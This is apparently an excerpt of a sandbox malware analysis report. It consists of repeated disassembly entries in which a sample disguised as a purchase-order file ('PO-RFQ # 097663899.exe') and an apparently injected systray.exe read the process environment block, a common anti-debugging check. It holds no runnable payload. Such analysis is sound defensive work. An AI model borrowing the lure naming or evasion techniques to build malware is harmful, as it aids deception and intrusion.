          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05097D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05128DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]
